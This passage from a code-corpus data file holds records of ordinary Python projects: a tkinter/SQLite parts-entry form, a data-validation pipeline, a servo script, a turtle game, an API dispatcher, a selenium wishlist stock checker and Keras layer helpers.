self.parts_ID_field = tkinter.Entry(self, textvariable=self.parts_ID_entry)\n self.parts_ID_field.pack()\n\n # label and field for manufacturer\n peripheral_type_label = tkinter.Label(self, text='Type (mouse, keyboard, etc)', font=('Helvetica', 14))\n peripheral_type_label.pack()\n self.peripheral_type_entry = tkinter.StringVar()\n self.peripheral_type_field = tkinter.Entry(self, textvariable=self.peripheral_type_entry)\n self.peripheral_type_field.pack()\n\n def create_buttons(self, controller):\n \"\"\" \n Creates buttons for the current page.\n \n - controller : the application\n \"\"\"\n submit_button = tkinter.Button(self, text='Submit information', font=controller.button_font,\n command=lambda: [self.run_query(), self.clear_fields()])\n submit_button.pack(pady=30)\n\n return_button = tkinter.Button(self, text='Return to view equipment', font=controller.button_font,\n command=lambda: controller.show_frame('EquipmentPage'))\n return_button.pack()\n\n ################################ EVENT HANDLERS ###################################\n\n def run_query(self):\n \"\"\"\n Runs a query which will insert all values\n from the page into the table.\n \"\"\"\n connection = sqlite3.connect('EduCycle.db')\n cursor = connection.cursor()\n\n # Get the tag number which was entered in the Equipment entry page\n cursor.execute('SELECT TU_Tag_Number FROM Equipment ORDER BY TU_Tag_Number DESC LIMIT 1') # gets the most recent tag number\n tu_tag_number = ''.join(cursor.fetchone()) # convert entry to a string\n\n # Get the current location which was entered in the Equipment entry page\n cursor.execute('SELECT Storage_Location FROM Equipment ORDER BY Storage_Location DESC LIMIT 1') # gets the most recent location number\n current_location = ''.join(cursor.fetchone()) # convert entry to a string\n\n cursor.execute(\"\"\"INSERT INTO Computer_Parts(PartsID, TU_Tag_Number, Parts_Type, current_location) \n VALUES (?, ?, ?, ?)\"\"\",\n (self.parts_ID_entry.get(), tu_tag_number, self.peripheral_type_entry.get(), current_location))\n\n connection.commit()\n connection.close()\n\n def clear_fields(self):\n \"\"\" \n Clears the fields for user input \n \"\"\"\n self.parts_ID_field.delete(0, 'end')\n self.peripheral_type_field.delete(0, 'end')\n","repo_name":"T-Visor/Educycle","sub_path":"application-contents/enterPartPage.py","file_name":"enterPartPage.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24078857431","text":"from Prediction_Raw_Data_Validation.predictionDataValidation import Prediction_Data_validation\nfrom DataTypeValidation_Insertion_Prediction.DataTypeValidationPrediction import dBOperation\nfrom DataTransformation_Prediction.DataTransformationPrediction import dataTransformPredict\nfrom datetime import datetime as dt\nfrom log_insertion_to_db.log_insertion_to_db import log_insertion_to_db\n\n\nclass pred_validation:\n def __init__(self, client, resource, bucket):\n self.raw_data = Prediction_Data_validation(client, resource, bucket)\n self.dataTransform = dataTransformPredict(client, resource, bucket)\n self.dBOperation = dBOperation(client, resource, bucket)\n self.db_obj = log_insertion_to_db(\"PredictionMainLog\")\n\n def prediction_validation(self):\n\n try:\n\n #extracting values from prediction schema\n print(\"starting validation of files\")\n print(\"getting raw data values from schema\")\n LengthOfDateStampInFile,LengthOfTimeStampInFile,column_names,noofcolumns = self.raw_data.valuesFromSchema()\n print(\"got the schema\")\n #getting the regex defined to validate filename\n print(\"creating manual regex for filename validation\")\n regex = self.raw_data.manualRegexCreation()\n print(\"amnual regex created\")\n #validating filename of prediction files\n print(\"validating file name\")\n self.raw_data.validationFileNameRaw(regex,LengthOfDateStampInFile,LengthOfTimeStampInFile)\n print(\"filename validated\")\n #validating column length in the file\n print(\"validating column lenght\")\n self.raw_data.validateColumnLength(noofcolumns)\n print(\"column length validated\")\n #validating if any column has all values missing\n print(\"column length validated\")\n print(\"validating missing values\")\n self.raw_data.validateMissingValuesInWholeColumn()\n print(\"missing values validated\")\n print(\"raw data validation complete\")\n\n #create database with given name, if present open the connection! Create table with columns given in schema\n data_db = {'objective': 'rawdata', 'message': \"Creating Prediction database Table\",\n 'time': dt.now().strftime(\"%d/%m/%Y %H:%M:%S\")}\n self.db_obj.insert_data(data_db)\n print(\"start creating prediction DataBase\")\n\n table = self.dBOperation.createTableDb('PredictionData')\n\n print(\"prediction table created\")\n data_db = {'objective': 'rawdata', 'message': \"Table Creation Completed for prediction\",\n 'time': dt.now().strftime(\"%d/%m/%Y %H:%M:%S\")}\n self.db_obj.insert_data(data_db)\n data_db = {'objective': 'rawdata', 'message': \"Insertion of data into Table Started for Prediction\",\n 'time': dt.now().strftime(\"%d/%m/%Y %H:%M:%S\")}\n self.db_obj.insert_data(data_db)\n\n # insert csv files in the table\n print(\"Inserting good data in table\")\n self.dBOperation.insertIntoTableGoodData(table)\n print(\"Good data is inserted into table\")\n data_db = {'objective': 'rawdata', 'message': \"Insertion of data into Table Completed for Prediction\",\n 'time': dt.now().strftime(\"%d/%m/%Y %H:%M:%S\")}\n self.db_obj.insert_data(data_db)\n print(\"done\")\n\n except Exception as e:\n raise e\n","repo_name":"shahriarkasib/cementStrengthPrediction","sub_path":"prediction_Validation_Insertion.py","file_name":"prediction_Validation_Insertion.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74817833011","text":"#!/usr/bin/env python3\nimport os, logging\nfrom argparse import ArgumentParser\nfrom mg996r import MG996R\n\nstart_degree = 360\nstate_file = '.servo-state'\n\nif __name__ == '__main__':\n # set logging level\n logging.basicConfig(level=logging.DEBUG)\n\n # parse arguments\n parser = ArgumentParser()\n parser.add_argument('--deg', type=int, required=True)\n parser.add_argument('--pin', type=str, default='PA6',\n help='GPIO pin to use')\n parser.add_argument('--reset', action='store_true',\n help=f'Use clean default state (degree = {start_degree})')\n args = parser.parse_args()\n\n # restore previous degree from a file\n if not args.reset:\n try:\n if os.path.exists(state_file):\n with open(state_file, 'r') as f:\n start_degree = int(f.read())\n if not 0 <= start_degree <= 360:\n raise ValueError(f'invalid degree value in {state_file}')\n except (IOError, ValueError) as e:\n logging.exception(e)\n\n servo = MG996R(args.pin, start_degree)\n servo.move(args.deg)\n\n # save degree to a file\n try:\n with open(state_file, 'w') as f:\n f.write(str(args.deg))\n except IOError as e:\n logging.exception(e)\n","repo_name":"gch1p/opi-mg996r","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36030818463","text":"import time\n# from tqdm import tqdm\nimport multiprocessing as mp\n\n\nclass OP():\n def __init__(self):\n # 直接调用 Manager 提供的 list() 和 dict()\n self.manager = mp.Manager\n self.mp_lst = self.manager().list()\n self.mp_dict = self.manager().dict()\n self.length = 64\n\n def proc_func(self, i, j):\n self.mp_lst.append(i)\n self.mp_dict[i] = j\n time.sleep(0.1)\n\n def flow(self):\n pool = mp.Pool(16)\n for i in range(self.length):\n pool.apply_async(self.proc_func, args=(i, i*2))\n pool.close()\n pool.join()\n\n\nif __name__ == '__main__':\n\n start_time = time.time()\n op = OP()\n op.flow()\n print(op.mp_lst)\n print(op.mp_dict)\n print(time.time() - start_time)","repo_name":"Chengxiaosa/sus","sub_path":"backend/resources/sus_crawler/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7606855448","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\ntourtoise = Player()\ncar_manager = CarManager()\nscore = Scoreboard()\n\n\nscreen.listen()\n\nscreen.onkey(fun=tourtoise.move, key=\"Up\")\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(0.1)\n screen.update()\n\n car_manager.create_car()\n car_manager.move_cars()\n\n # Detect collision with cars\n for car in car_manager.all_cars:\n if car.distance(tourtoise) < 20:\n game_is_on = False\n score.game_over()\n\n # Detect when player reached finish line\n if tourtoise.ycor() > 260:\n tourtoise.go_to_start()\n car_manager.level_up()\n score.increase_score()\n\n\n\nscreen.exitonclick()\n","repo_name":"dbanisor/turtle_crossing_game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36465030345","text":"#\n# * Core 65, Most Frequenct Digit Sum\n# * Medium\n\n# * A step(x) operation works like this: it changes a number x into x - s(x), \n# * where s(x) is the sum of x's digits. You like applying functions to numbers, \n# * so given the number n, you decide to build a decreasing sequence of numbers: \n# * n, step(n), step(step(n)), etc., with 0 as the last element.\n\n# Building a single sequence isn't enough for you, so you replace all elements of \n# the sequence with the sums of their digits (s(x)). Now you're curious as to which \n# number appears in the new sequence most often. If there are several answers, \n# return the maximal one.\n\n# * Example\n\n# For n = 88, the output should be\n# mostFrequentDigitSum(n) = 9.\n# Here is the first sequence you built: 88, 72, 63, 54, 45, 36, 27, 18, 9, 0;\n# And here is s(x) for each of its elements: 16, 9, 9, 9, 9, 9, 9, 9, 9, 0.\n\n# As you can see, the most frequent number in the second sequence is 9.\n\n# For n = 8, the output should be\n# mostFrequentDigitSum(n) = 8.\n# At first you built the following sequence: 8, 0\n# s(x) for each of its elements is: 8, 0\n\n# As you can see, the answer is 8 (it appears as often as 0, but is greater than it).\n\n# * Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] integer n\n# Guaranteed constraints:\n# 1 ≤ n ≤ 105.\n\n# [output] integer\n# The most frequent number in the sequence s(n), s(step(n)), s(step(step(n))), etc.\n\n#%%\n\n# * Solution 1\ndef mostFrequentDigitSum(n: int) -> int:\n\n # * helper \n def s(n:int) -> int:\n sum = 0\n while n > 0:\n sum += n%10\n n //= 10\n\n return sum\n\n\n # numbers = []\n # numbers.append(n)\n sx = []\n\n while n > 0:\n sn = s(n)\n sx.append(sn)\n n = n - sn\n # numbers.append(n)\n \n sx.append(0)\n\n # print(numbers)\n print(sx)\n\n count = {}\n for x in sx:\n if x in count:\n count[x] += 1\n else:\n count[x] = 1\n \n maxKey = float('-inf')\n maxValue = float('-inf')\n for k, v in count.items():\n if v > maxValue or (v == maxValue and k > maxKey):\n maxValue = v\n maxKey = k\n\n return maxKey\n\n\n\n\na1 = 88\nr1 = mostFrequentDigitSum(a1)\nprint(r1)\n\na1 = 17\nr1 = mostFrequentDigitSum(a1)\nprint(r1)\n\n# a1 = 99999\n# r1 = mostFrequentDigitSum(a1)\n# print(r1)\n\n\n# %%\n","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Core/C65MostFrequentDigitSum.py","file_name":"C65MostFrequentDigitSum.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22427789739","text":"import os\nimport yaml\nfrom typing import List\n\nfrom codelearn.base import CONFIG_PATH\n\nclass Config:\n def __init__(\n self,\n allowed_licenses: List[str], \n allowed_size: int = 200 * 1024, \n space_size: int = 1024 * 1024,\n github_token = None,\n max_clean_threadshold_size: int = 800 * 1024 * 1024,\n after_cleaned_threadshold_size: int = 600 * 1024 * 1024,\n limit_api_token: bool = False,\n api_token_limit_size: int = 2 * 1024,\n ):\n self.allowed_licenses = allowed_licenses\n self.allowed_size = allowed_size\n self.space_size = space_size\n if not github_token:\n github_token = os.environ.get('GITHUB_TOKEN')\n self.github_token = github_token\n self.enable_licenses = True\n self.max_clean_threadshold_size = max_clean_threadshold_size\n self.after_cleaned_threadshold_size = after_cleaned_threadshold_size\n self.limit_api_token = limit_api_token\n self.api_token_limit_size = api_token_limit_size\n\ndef load_config(file_name: str) -> Config:\n # 获取当前脚本所在目录\n dir_path = os.path.dirname(os.path.abspath(__file__))\n file_path = os.path.join(dir_path, file_name)\n \n with open(file_path, 'r') as file:\n data = yaml.safe_load(file)\n return Config(**data)\n\nproject_config = load_config(CONFIG_PATH)","repo_name":"FISHers6/CodeLearn-Agent","sub_path":"codelearn/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"11902583762","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for WooYun project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n#\n\nBOT_NAME = 'WooYun'\n\nSPIDER_MODULES = ['WooYun.spiders']\nNEWSPIDER_MODULE = 'WooYun.spiders'\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'WooYun (+http://www.yourdomain.com)'\n\nITEM_PIPELINES = {\n 'WooYun.pipelines.JsonWriterPipeline': 300,\n # 'WooYun.pipelines.MongoDBPipeline':800,\n # 'myproject.pipelines.JsonWriterPipeline': 800,\n}\n","repo_name":"fsxchen/ScrapyWooYun","sub_path":"WooYun/WooYun/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12814265051","text":"# Alex Cheung s\n# web scraper using selenium webdriver\nfrom selenium import webdriver\n\n# time sleep \n# or import time; time.sleep(5) \nfrom time import sleep\n\n# https://stackoverflow.com/questions/69418411/how-to-get-rid-of-response-messages-initiating-google-chrome-using-chromedriver\n#from selenium.webdriver.chrome.options import Options\n# for getting rid of print statements from machine to help clear my debugs\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\n\n\n# MAY VARY BETWEEN USERS\n# load default profile instead of canonical form\n# chrome profile data in chrome://version/ in address bar\n# C:\\Users\\Acai\\AppData\\Local\\Google\\Chrome\\User Data\n#options.add_argument(r\"user-data-dir=C:\\Users\\Acai\\AppData\\Local\\Google\\Chrome\\User Data\")\n# couldnt get to work along with driver PATH\n\n\n# headless chrome \n#options.add_argument(\"--headless\")\n\n# my laptop chromedriver path to use\nPATH = \"C:\\Program Files (x86)\\chromedriver.exe\"\n# options for getting rid of response messages\ndriver = webdriver.Chrome(executable_path=PATH, options=options)\n\n# open google.com website\n#driver.get(\"https://google.com\")\n\n# driver title, url, window id\n# print(driver.title)\n# print(driver.current_url)\n#print(driver.current_window_handle)\n\n# refresh page\n# driver.refresh()\n\n# box lunch tanjiro dragon\n# driver.get(\"https://www.boxlunch.com/product/funko-pop-animation-demon-slayer-kimetsu-no-yaiba-tanjiro-kamado-water-breathing-glow-in-the-dark-vinyl-figure---boxlunch-exclusive/13399920.html\")\n# hot topic tanjiro training\n# driver.get(\"https://www.hottopic.com/product/funko-demon-slayer-kimetsu-no-yaiba-pop-animation-tanjiro-with-mask-vinyl-figure-hot-topic-exclusive/13412216.html\")\n\n'''\ntry:\n in_stock = driver.find_element_by_class_name('color-green')\n print(\"DEBUG:\", in_stock.text)\nexcept:\n print(\"DEBUG: no color-green class\")\n'''\n\n# Wishlist check in stock orders instead of individual websites: can check all at once\n# hot topic and box lunch have essentially the same websites (sister companies)\n# In stock: \"is-in-stock\"\n# Presale: \"on-order\"\n# Out of stock: \"notavailable\"\n\n# potential: somehow clear cache after each refresh? If needed\n# Will take longer to load but will always display most up to date\n\ncounter = 2\nstill_searching = True\nwhile (counter > 0 and still_searching):\n print(\"DEBUG: counter:\", counter)\n # hot topic wishlist\n driver.get(\"https://www.hottopic.com/showotherwishlist?WishListID=aeff70bb93d57f2d850769dc99\")\n try: \n # in stock \n can_buy = driver.find_element_by_class_name('is-in-stock')\n still_searching = False\n print(\"DEBUG: HT IN STOCK!\")\n except:\n # presale\n try: \n can_buy = driver.find_element_by_class_name('on-order')\n still_searching = False\n print(\"DEBUG: HT CAN PRESALE!\")\n except:\n print(\"DEBUG: HT no stock\")\n\n # box lunch wishlist\n driver.get(\"https://www.boxlunch.com/showotherwishlist?WishListID=a9eb980965a10adbfc6edb0556\")\n try: \n # in stock\n can_buy = driver.find_element_by_class_name('is-in-stock')\n still_searching = False\n print(\"DEBUG: BL IN STOCK!\")\n except:\n # presale\n try: \n can_buy = driver.find_element_by_class_name('on-order')\n still_searching = False\n print(\"DEBUG: BL CAN PRESALE\")\n except:\n print(\"DEBUG: BL no stock\")\n\n counter -= 1\n sleep(0)\n\n\n\n'''\ncounter = 1\nwhile (counter != 0):\n print(\"DEBUG: counter:\", counter)\n # box lunch tanjiro dragon\n driver.get(\"https://www.boxlunch.com/product/funko-pop-animation-demon-slayer-kimetsu-no-yaiba-tanjiro-kamado-water-breathing-glow-in-the-dark-vinyl-figure---boxlunch-exclusive/13399920.html\")\n try: \n add_to_cart = driver.find_element_by_id('add-to-cart')\n print(\"DEBUG: IN STOCK\")\n print(\"DEBUG: ADD TO CART ID:\", add_to_cart.text)\n except:\n print(\"DEBUG: NO ADD TO CART ID\")\n\n # hot topic tanjiro training\n driver.get(\"https://www.hottopic.com/product/funko-demon-slayer-kimetsu-no-yaiba-pop-animation-tanjiro-with-mask-vinyl-figure-hot-topic-exclusive/13412216.html\")\n try: \n add_to_cart = driver.find_element_by_id('add-to-cart')\n print(\"DEBUG: IN STOCK\")\n print(\"DEBUG: ADD TO CART ID:\", add_to_cart.text)\n except:\n print(\"DEBUG: NO ADD TO CART ID\")\n\n counter -= 1\n sleep(5)\n'''\n\n'''\ntry: \n add_to_cart = driver.find_element_by_id('add-to-cart')\n print(\"DEBUG: ADD TO CART ID:\", add_to_cart)\nexcept:\n print(\"DEBUG: NO ADD TO CART ID\")\n'''\n\n\nif (still_searching):\n print(\"DEBUG: searches ended: nothing in stock\")\nelse:\n print(\"SOMETHING IS IN STOCK!\")\nprint(\"DEBUG: DONE WITH PROGRAM\")\n\n# sleep 5 seconds\n# sleep(5)\n\n# close tab\n#driver.close()\n\n# close window and end process\ndriver.quit()\n\n# end of program","repo_name":"AlexKCheung/Web-Scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33658717274","text":"import tkinter as tk\nfrom PIL import ImageTk, Image\nimport cv2\nfrom filters_live.video_filtering_face import video_filtering_face,change_filter\nfrom tkinter_custom_button import TkinterCustomButton\nfrom tkinter import Tk\nfrom tkinter.ttk import Frame, Label\nfrom background_live.request_image import add_path,check_image\n\nsave = False\ncount_filter = -1\ncount_back = 0\nshow_filter_live = False\nshow_background_live = False\n\n\n\n\ndef camera(newWindow):\n app = Frame(newWindow)\n app.pack()\n lmain = Label(app)\n lmain.pack()\n\n def on_closing(top):\n top.destroy()\n\n\n def printInput():\n add_path(inputtxt2.get(1.0, \"end-1c\"))\n\n inputtxt2 = tk.Text(newWindow,\n height=1,\n width=20)\n inputtxt2.place(x=400,y=550)\n printButton = TkinterCustomButton(master=newWindow,text=\"Add New Background\", corner_radius=5, command=printInput,\n fg_color=\"#FF5C58\",hover_color=\"#ff544f\",width=150,cursor=\"shuttle\", text_font=(\"sans-serif\", 10))\n printButton.place(x=408,y=570)\n\n def nextback():\n global count_back, show_background_live\n len_image = check_image()\n if count_back == len_image:\n show_background_live = False\n count_back = 0\n else:\n count_back += 1\n show_background_live = True\n\n def nextWindow():\n global count_filter, show_filter_live\n if count_filter == len(change_filter) - 1:\n show_filter_live = False\n count_filter = -1\n else:\n count_filter += 1\n show_filter_live = True\n\n # def saveWindow():\n\n\n\n importButton = TkinterCustomButton(master=newWindow,text=\"Next background\", corner_radius=5, command=nextback,\n fg_color=\"#FF5C58\",hover_color=\"#ff544f\",\n width=300,\n cursor=\"shuttle\", text_font=(\"sans-serif\", 20))\n importButton.place(x=500,y=490)\n importButton = TkinterCustomButton(master=newWindow,text=\"Next filter\", corner_radius=5, command=nextWindow,\n fg_color=\"#FF5C58\",hover_color=\"#ff544f\",\n width=300, cursor=\"shuttle\", text_font=(\"sans-serif\", 20))\n importButton.place(x=160,y=490)\n image = tk.PhotoImage(file='../assest/camera.png')\n importButton = TkinterCustomButton(master=newWindow, corner_radius=20,\n command=lambda:open_popup(newWindow), fg_color=\"#f1f1f1\", hover_color=\"#c1c1c1\", cursor=\"shuttle\",\n image=image,\n width=50)\n importButton.place(x=740,y=431)\n\n def video_stream3():\n\n frame = video_filtering_face(\n change_filter[count_filter]['filter'],\n change_filter[count_filter]['center'],\n change_filter[count_filter]['width'],\n change_filter[count_filter]['height'],\n change_filter[count_filter]['up'],\n change_filter[count_filter]['left'],\n f'../assest/background/back{count_back}.png',\n 1,show_filter_live,show_background_live\n\n )\n\n cv2image2 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img2 = Image.fromarray(cv2image2)\n imgtk2 = ImageTk.PhotoImage(image=img2)\n lmain.imgtk = imgtk2\n lmain.configure(image=imgtk2)\n if save:\n save_image(frame)\n lmain.after(1, video_stream3)\n def save_image(frame):\n global save\n save = False\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(image=img)\n lmain.imgtk = imgtk\n lmain.configure(image=imgtk)\n path_name(frame)\n\n def print_path2(inputtxt, frame):\n global top\n name = inputtxt.get(1.0, \"end-1c\")\n img_name = f\"../saved/{name}.png\"\n cv2.imwrite(img_name, frame)\n inputtxt.delete('1.0', tk.END)\n on_closing(top)\n\n newWindow.geometry(\"960x630\")\n newWindow.bind(\"\", lambda x: nextWindow())\n newWindow.bind(\"\", lambda x: nextback())\n video_stream3()\n top =''\n def open_popup(newWindow):\n global top\n top = tk.Toplevel(newWindow)\n top.geometry(\"250x150\")\n top.title(\"save\")\n global save\n save = True\n\n def path_name(frame):\n global top\n inputtxt = tk.Text(top,\n height=5,\n width=20)\n\n inputtxt.pack()\n printButton = TkinterCustomButton(master=top,text=\"Save Image\", corner_radius=5, command=lambda: print_path2(inputtxt, frame), fg_color=\"#2da44e\",\n hover_color=\"#24843f\", width=150,cursor=\"shuttle\", text_font=(\"sans-serif\", 20))\n printButton.pack()\n\n# newWindow.mainloop()\n\n\n","repo_name":"Python-Hiss/Filteristic","sub_path":"Tkinter/GUI_Live.py","file_name":"GUI_Live.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12000967918","text":"import os\nfrom configparser import ConfigParser\n\nCONFIG_FILE_NAME = 'client.conf'\nCONFIG_PATH_PREFIX = '.config/osh'\n\n\nconf = None\n\n\nclass Conf:\n def __init__(self, system_conf=None):\n self.conf = self.load_config()\n self.system_conf = system_conf\n\n def get_conf_dir(self):\n \"\"\"\n If conf dir does not exist, create it\n return full path to conf dir ( ~/.config/osh/ )\n \"\"\"\n config_dir = os.path.join(os.path.expanduser('~'), CONFIG_PATH_PREFIX)\n if not os.path.exists(config_dir):\n os.makedirs(config_dir)\n return config_dir\n\n def get_config_file(self):\n \"\"\"\n Returns path where configuration file lives.\n Path is /.config/osh/config.conf\n \"\"\"\n config_path = os.path.join(self.get_conf_dir(), CONFIG_FILE_NAME)\n\n if not os.path.exists(config_path):\n config = ConfigParser()\n config.add_section('General')\n # fedora-rawhide-x86_64 is set at /etc/osh/client.conf\n # user should decide what they want in their own conf file\n config.set('General', 'DefaultMockConfig', '')\n\n with open(config_path, 'w') as f:\n config.write(f)\n\n return config_path\n\n def load_config(self):\n \"\"\"\n load configuration and return ConfigParser object\n \"\"\"\n cf = self.get_config_file()\n config = ConfigParser()\n config.read(cf)\n return config\n\n def get_default_mockconfig(self):\n \"\"\"\n Return name of default MockConfig\n \"\"\"\n def_config = self.conf.get('General', 'DefaultMockConfig')\n if not def_config:\n def_config = self.system_conf['DEFAULT_MOCKCONFIG']\n return def_config\n\n\ndef get_conf(system_conf=None):\n global conf\n if conf is None:\n conf = Conf(system_conf)\n return conf\n","repo_name":"openscanhub/openscanhub","sub_path":"osh/client/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"10381189701","text":"import os\nfrom apis.api_factory import ArxivAPI, ClinicalTrialsAPI, JSONPlaceholderAPI, NHANESApi, NewsApi, OpenWeatherAPI, PubMedAPI, WikipediaAPI, YelpFusionAPI\n\nclass APIDispatcher:\n def __init__(self, api_name):\n self.api_name = api_name\n self.api = self.get_api()\n \n def get_api(self):\n if self.api_name == \"yelp\":\n YELP_API_KEY = os.getenv(\"YELP_API_KEY\", \"\")\n return YelpFusionAPI(YELP_API_KEY)\n elif self.api_name == \"arxiv\":\n return ArxivAPI()\n elif self.api_name == \"wikipedia\":\n return WikipediaAPI()\n elif self.api_name == \"openweather\":\n OPENWEATHER_API_KEY = os.getenv(\"OPENWEATHER_API_KEY\", \"\")\n return OpenWeatherAPI(OPENWEATHER_API_KEY)\n elif self.api_name == \"jsonplaceholder\":\n return JSONPlaceholderAPI(\"foo\")\n elif self.api_name == \"nhanes\":\n return NHANESApi()\n elif self.api_name == \"newsapi\":\n NEWS_API_KEY = os.getenv(\"NEWS_API_KEY\", \"\")\n return NewsApi(NEWS_API_KEY)\n elif self.api_name == \"pubmed\":\n PUBMED_API_MAIL = os.getenv(\"PUBMED_API_MAIL\", \"\")\n return PubMedAPI(PUBMED_API_MAIL)\n elif self.api_name == \"clinicaltrials\":\n return ClinicalTrialsAPI()\n else:\n raise ValueError(\"Invalid API name.\")\n \n def make_api_call(self, *args):\n return self.api.make_api_call(*args)\n","repo_name":"mtrsklnkvMM/babygpt","sub_path":"apis/api_dispatcher.py","file_name":"api_dispatcher.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40710108424","text":"\"\"\"\n\nNotes\n-----\n在这个模块中, 我们引入了时间统计的装饰子\n\"\"\"\n\nfrom functools import wraps\nfrom timeit import default_timer as dtimer \n\ndef timer(func):\n \"\"\"\n Notes\n -----\n 测试函数运行的墙上时间。\n \"\"\"\n @wraps(func)\n def run(*args, **kwargs):\n start = dtimer()\n val = func(*args, **kwargs)\n end = dtimer()\n print('run {} with time:'.format(func.__name__), end - start)\n return val \n return run \n","repo_name":"weihuayi/fealpy","sub_path":"fealpy/decorator/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"zh","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"41971901413","text":"\nimport tensorflow as tf\nfrom keras import backend as K\n#from keras.engine.topology import Layer\nfrom tensorflow.python.keras.layers import Layer\nfrom keras.layers import ZeroPadding2D, Cropping2D\nfrom keras.layers import Activation, BatchNormalization, Conv2D, Lambda, UpSampling2D, Input, Conv2DTranspose, MaxPooling2D, Dropout\nfrom keras.layers import concatenate, add, average, multiply\n\ndef mvn(tensor):\n '''Performs per-channel spatial mean-variance normalization.'''\n epsilon = 1e-6\n mean = K.mean(tensor, axis=(1,2), keepdims=True)\n std = K.std(tensor, axis=(1,2), keepdims=True)\n mvn = (tensor - mean) / (std + epsilon)\n \n return mvn\n\ndef crop(tensors):\n '''\n List of 2 tensors, the second tensor having larger spatial dimensions.\n '''\n h_dims, w_dims = [], []\n for t in tensors:\n b, h, w, d = t._keras_shape\n h_dims.append(h)\n w_dims.append(w)\n crop_h, crop_w = (h_dims[1] - h_dims[0]), (w_dims[1] - w_dims[0])\n rem_h = int(crop_h % 2)\n rem_w = int(crop_w % 2)\n tt_h = int(crop_h / 2)\n tt_w = int(crop_w / 2)\n crop_h_dims = (tt_h, tt_h + rem_h)\n crop_w_dims = (tt_w, tt_w + rem_w)\n cropped = Cropping2D(cropping=(crop_h_dims, crop_w_dims))(tensors[1])\n \n return cropped\n\nclass MaxPoolingWithIndices(Layer):\n def __init__(self, pool_size,strides,padding='SAME',**kwargs):\n super(MaxPoolingWithIndices, self).__init__(**kwargs)\n self.pool_size=pool_size\n self.strides=strides\n self.padding=padding\n return\n def call(self,x):\n pool_size=self.pool_size\n strides=self.strides\n if isinstance(pool_size,int):\n ps=[1,pool_size,pool_size,1]\n else:\n ps=[1,pool_size[0],pool_size[1],1]\n if isinstance(strides,int):\n st=[1,strides,strides,1]\n else:\n st=[1,strides[0],strides[1],1]\n output1,output2=tf.nn.max_pool_with_argmax(x,ps,st,self.padding)\n return [output1,output2]\n def compute_output_shape(self, input_shape):\n if isinstance(self.pool_size,int):\n output_shape=(input_shape[0],input_shape[1]//self.pool_size,input_shape[2]//self.pool_size,input_shape[3])\n else:\n output_shape=(input_shape[0],input_shape[1]//self.pool_size[0],input_shape[2]//self.pool_size[1],input_shape[3])\n return [output_shape,output_shape]\n\n\nclass UpSamplingWithIndices(Layer):\n def __init__(self, **kwargs):\n super(UpSamplingWithIndices, self).__init__(**kwargs)\n return\n def call(self,x):\n argmax=K.cast(K.flatten(x[1]),'int32')\n max_value=K.flatten(x[0])\n with tf.compat.v1.variable_scope(self.name):\n input_shape=K.shape(x[0])\n batch_size=input_shape[0]\n image_size=input_shape[1]*input_shape[2]*input_shape[3]\n output_shape=[input_shape[0],input_shape[1]*2,input_shape[2]*2,input_shape[3]]\n indices_0=K.flatten(tf.multiply(K.reshape(tf.range(batch_size),(batch_size,1)),K.ones_like((1,image_size),dtype='int32')))\n indices_1=argmax%(image_size*4)//(output_shape[2]*output_shape[3])\n indices_2=argmax%(output_shape[2]*output_shape[3])//output_shape[3]\n indices_3=argmax%output_shape[3]\n indices=tf.stack([indices_0,indices_1,indices_2,indices_3])\n output=tf.scatter_nd(K.transpose(indices),max_value,output_shape)\n return output\n def compute_output_shape(self, input_shape):\n shape_x, shape_argmax = input_shape\n return shape_x[0],shape_x[1]*2,shape_x[2]*2,shape_x[3]\n\ndef standard_block(input_tensor, stage, 